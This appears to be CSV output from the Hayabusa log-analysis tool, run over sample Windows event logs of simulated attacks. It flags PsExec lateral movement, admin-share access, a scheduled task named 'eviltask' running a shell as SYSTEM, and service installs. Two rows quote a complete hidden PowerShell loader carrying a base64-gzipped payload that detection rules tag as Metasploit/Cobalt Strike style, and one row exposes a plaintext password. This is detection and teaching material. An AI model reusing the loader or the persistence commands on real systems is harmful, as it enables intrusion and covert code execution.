+2021-04-21 05:33:14.860 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:14.861 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.17:137 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:18.296 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.15:137 (MSEDGEWIN10.home) | Dst: 10.0.3.255:137 () | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:18.296 +09:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.3.255:137 () | Dst: 10.0.3.15:137 (MSEDGEWIN10.home) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:20.254 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49926 (MSEDGEWIN10) | Dst: 127.0.0.1:5357 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
+2021-04-21 18:27:56.082 +09:00,jump01.offsec.lan,7045,high,,PSExec Lateral Movement,Service: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_LateralMovement-PSEXEC.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
+2021-04-21 18:27:56.082 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx
+2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: PSEXESVC.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375fd8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1375ff5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376003,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.42.22 | LID: 0x1376020,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.363 +09:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,Name: PSEXESVC | Path: %SystemRoot%\PSEXESVC.exe | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1376020,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.364 +09:00,srvdefender01.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: PSEXESVC | User: admmig | LID: 0x1376020 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:40:32.531 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""cmd.exe"" -u demo\admmig -p Admin1235 -accepteula | Path: C:\Windows\cmd.exe | PID: 0x15d4 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:41:03.008 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x590 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:42:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1050 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 18:43:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf90 | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
+2021-04-21 22:30:00.569 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\schtasks.exe"" /create /sc minute /mo 1 /tn eviltask /tr C:\tools\shell.cmd /ru SYSTEM | Path: C:\Windows\System32\schtasks.exe | PID: 0x15b4 | User: admmig | LID: 0x6fc89e",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx
+2021-04-21 22:30:00.589 +09:00,srvdefender01.offsec.lan,4698,info,,Task Created,"Name: \eviltask | Content: <?xml version=""1.0"" encoding=""UTF-16""?> <Task version=""1.2"" xmlns=""http://schemas.microsoft.com/windows/2004/02/mit/task""> <RegistrationInfo> <Date>2021-04-21T13:30:00</Date> <Author>OFFSEC\admmig</Author> <URI>\eviltask</URI> </RegistrationInfo> <Triggers> <TimeTrigger> <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <StartBoundary>2021-04-21T13:30:00</StartBoundary> <Enabled>true</Enabled> </TimeTrigger> </Triggers> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <Duration>PT10M</Duration> <WaitTimeout>PT1H</WaitTimeout> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context=""Author""> <Exec> <Command>C:\tools\shell.cmd</Command> </Exec> </Actions> <Principals> <Principal id=""Author""> <UserId>S-1-5-18</UserId> <RunLevel>LeastPrivilege</RunLevel> </Principal> </Principals> </Task> | User: admmig | LID: 0x6fc89e",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx
+2021-04-21 22:30:03.012 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x2ac | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx
+2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx
+2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx
+2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x1659379,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1659379",../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,../hayabusa-rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,../hayabusa-rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,info,Persis,Service Installed,"Name: iOWamcEn | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dX